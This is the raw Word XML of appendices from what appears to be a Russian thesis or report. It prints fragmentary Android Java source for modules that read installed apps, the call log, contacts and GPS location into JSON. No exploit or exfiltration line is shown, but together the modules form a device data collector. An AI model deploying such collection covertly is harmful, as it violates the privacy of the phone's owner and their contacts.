      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF"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android.content.pm.PackageInfo</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java.util.List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Apps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withSystemPackages)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List</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PackageInfo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">packages </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>context</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getPackageManager()</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    .getInstalledPackages(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for </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">i = </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1750EB"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; i &lt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>packages</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.size(); i++) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PackageInfo packageInfo </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>packages</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.get(i);</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(!withSystemPackages &amp;&amp;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 xml:space="preserve">versionName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continue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"appName"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applicationInfo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.loadLabel(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>context</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getPackageManager()</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                            ).toString()</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"packageName"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packageName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"varsionName"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"versionCode"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versionCode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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0054048E" w:rsidRDefault="0054048E">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc61505583"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Д</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля вызовов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="00DB60A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB60A5" w:rsidRDefault="00DB60A5" w:rsidP="00DB60A5">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001E447A">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android.net.Uri</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android.provider.CallLog</w:t>
            </w:r>
            <w:r w:rsidR="00753BE3">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001E447A">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Calls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0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Uri allCalls </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Uri</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>parse</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"content://call_log/calls"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().getContentResolver().query(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allCalls</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CACHED_NAME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Integer</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>parseInt</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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E447A" w:rsidRPr="00064AB5" w:rsidRDefault="001E447A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064AB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc61505584"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Е</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0933" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля контактов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="00DB60A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB60A5" w:rsidRDefault="00DB60A5" w:rsidP="00C90951">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android.provider.ContactsContract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Contacts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00000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    </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.getContentResolver()</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    .query(</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CONTENT_URI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String[]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color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rP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 xml:space="preserve">DISPLAY_NAME </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+ </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>" ASC"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </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w:t>
            </w:r>
            <w:r w:rsidR="001E447A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> e.printStackTrace();</w:t>
            </w:r>
            <w:r w:rsidR="001E447A">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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006657C4" w:rsidRPr="00355B45" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355B45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc61505585"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ж</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля геолокации</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="00DB60A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB60A5" w:rsidRDefault="00DB60A5" w:rsidP="00DB60A5">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android.Manifest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android.location.LocationListener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android.os.Bundle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Locations </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">implements </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">LocationListener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final </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Context </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consola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w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">android.location.Location </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="871094"/>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LocationManager </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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context) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:b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871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">context </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= context;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        update();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boolean </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>isCanGetLocation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canGetLocation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android.location.Location </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>update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locationManager </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LocationManager</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.getSystemService(</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i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LOCATION_SERVICE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locationManager </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">!= </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">null </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;&amp;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ACCESS_FINE_LOCATION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 xml:space="preserve">PERMISSION_GRANTED </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </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ACCESS_COARSE_LOCATION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PERMISSION_GRANTED</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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isGPSEnabled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if </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</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sidR="001E447A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:r w:rsidR="001E447A">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.getSpeed();</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 {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            e.printStackTrace();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location</w:t>
            </w:r>
            <w:r w:rsidR="001E447A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidR="001E447A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r w:rsidR="001E447A">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JSONObject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00753BE3">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"enabled"</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"latitude"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserv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"longitude"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserv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"altitude"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserv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"accuracy"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">,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"speed"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">,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Pr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>e) {</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object</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onLocationChanged</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">android.location.Location </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>location)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(location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location.getLatitude();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location.getLongitude();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location.getAltitude();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location.getAccuracy();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locat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ion.getSpeed();</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onProviderDisabled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onProviderEnabled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onStatusChanged</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 xml:space="preserve">provider, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
